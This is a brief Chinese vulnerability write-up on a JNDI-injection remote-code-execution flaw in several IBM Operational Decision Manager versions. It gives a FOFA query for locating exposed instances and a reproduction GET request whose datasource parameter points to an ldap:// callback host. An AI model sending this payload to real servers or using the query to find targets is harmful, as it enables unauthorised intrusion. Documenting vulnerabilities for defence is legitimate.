0x01 产品简介
IBM Operational Decision Manager是一个功能强大的决策管理平台,可简化决策的编写和编辑,具有追溯、模拟、版本控制和审计等企业级功能。
0x02 漏洞概述
IBM Operational Decision Manager 8.10.3、8.10.4、8.10.5.1、8.11、8.11.0.1 和 8.12.0.1 在将未经检查的参数传递给某个 API 时,容易受到通过 JNDI 注入进行的远程代码执行攻击。
0x03 测绘语句
fofa语句:title="IBM ODM"
0x04 漏洞复现
GET /decisioncenter-api/v1/about?datasource=ldap://cr75xy2yvof2dx9m3e47objfq6wyko8d.oastify.com HTTP/1.1
使用 burp自带的dnslog